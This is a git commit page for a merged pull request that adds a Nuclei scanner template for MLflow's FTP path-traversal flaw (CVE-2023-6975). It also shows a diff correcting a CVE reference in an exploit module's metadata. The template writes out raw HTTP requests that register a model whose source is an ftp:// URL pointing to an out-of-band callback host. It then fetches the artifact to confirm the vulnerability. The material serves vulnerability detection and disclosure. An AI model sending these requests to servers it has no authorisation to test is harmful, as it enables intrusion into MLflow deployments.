Merge pull request #9 from protectai/feb-exploit-release
Added mlflow URL parsing confusion Nuclei Template (CVE-2023-6975)main
commit
655e78ff31
|
@ -0,0 +1,41 @@
|
|||
id: mlflow-url-parsing-confusion-lfi
|
||||
info:
|
||||
name: MLflow FTP Path Traversal
|
||||
author: kevin-mizu, byt3bl33d3r
|
||||
severity: high
|
||||
description: An issue in MLflow's handling of FTP URLs allows for path traversal, enabling attackers to write files to arbitrary locations on the server.
|
||||
reference: https://huntr.com/bounties/029a3824-cee3-4cf1-b260-7138aa539b85/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
|
||||
cvss-score: 9.3
|
||||
cve-id: CVE-2023-6975
|
||||
cwe-id: CWE-29
|
||||
tags: mlflow,ml,cve,path-traversal
|
||||
|
||||
variables:
|
||||
experiment_name: "{{rand_text_alpha(6)}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"name": "{{experiment_name}}"}
|
||||
- |
|
||||
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"name": "{{experiment_name}}", "source": "ftp://{{interactsh-url}}/a"}
|
||||
- |
|
||||
GET /model-versions/get-artifact?path=random&name={{experiment_name}}&version=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
|
@ -38,7 +38,7 @@ metadata = {
|
|||
'license': 'MSF_LICENSE',
|
||||
'references': [
|
||||
{'type': 'url', 'ref': 'https://huntr.com/bounties/b27148e3-4da4-4e12-95ae-756d33d94687/'},
|
||||
{'type': 'cve', 'ref': 'CVE-2023-6025'}
|
||||
{'type': 'cve', 'ref': 'CVE-2023-31036'}
|
||||
],
|
||||
'type': 'remote_exploit_cmd_stager',
|
||||
'targets': [
|
||||
|
|
Loading…
Reference in New Issue